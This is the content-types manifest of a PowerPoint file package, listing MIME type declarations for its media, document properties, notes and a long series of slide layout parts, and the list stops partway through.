
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Default Extension="JPG" ContentType="image/.jpg"/>
  <Default Extension="png" ContentType="image/png"/>
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/>
  <Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/>
  <Override PartName="/docProps/custom.xml" ContentType="application/vnd.openxmlformats-officedocument.custom-properties+xml"/>
  <Override PartName="/ppt/handoutMasters/handoutMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.handoutMaster+xml"/>
  <Override PartName="/ppt/media/image10.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image12.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image14.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image16.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image18.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image20.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image22.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image24.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image26.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image28.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image30.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image32.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image34.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image36.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image38.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image40.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image6.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/media/image8.svg" ContentType="image/svg+xml"/>
  <Override PartName="/ppt/notesMasters/notesMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesMaster+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide1.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xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide30.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presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/>
  <Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presentation.main+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout100.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1000.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1001.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1002.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1003.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1004.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1005.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1006.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1007.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1008.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1009.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout101.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1010.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1011.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1012.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1013.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1014.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1015.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1016.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1017.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1018.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1019.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout102.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1020.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1021.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1022.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1023.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1024.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1025.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1026.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1027.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1028.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1029.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout103.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1030.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1031.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1032.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1033.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1034.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1035.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1036.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1037.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1038.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1039.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout104.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1040.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1041.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1042.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1043.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1044.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1045.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1046.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1047.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1048.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1049.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout105.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1050.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1051.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1052.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1053.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1054.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1055.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1056.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1057.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1058.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1059.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout106.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1060.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1061.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1062.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1063.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1064.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1065.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1066.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1067.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1068.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1069.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout107.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1070.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1071.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1072.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1073.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1074.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1075.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1076.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1077.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1078.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1079.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout108.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1080.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1081.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1082.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1083.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1084.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1085.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1086.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1087.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1088.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1089.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout109.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1090.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1091.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1092.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1093.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1094.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1095.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1096.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1097.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1098.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1099.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout110.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1100.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1101.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1102.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1103.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1104.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1105.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1106.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1107.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1108.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1109.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout111.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1110.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1111.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1112.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1113.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1114.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1115.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1116.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1117.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1118.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1119.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout112.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1120.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1121.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1122.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1123.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1124.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1125.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1126.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1127.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1128.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1129.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout113.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1130.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1131.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1132.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1133.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1134.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1135.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1136.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1137.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1138.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1139.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout114.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1140.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1141.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1142.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1143.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1144.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1145.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1146.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1147.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1148.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1149.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout115.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1150.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1151.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1152.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1153.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1154.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1155.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1156.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1157.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1158.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1159.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout116.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1160.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1161.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1162.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1163.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1164.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1165.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1166.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1167.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1168.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1169.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout117.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1170.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
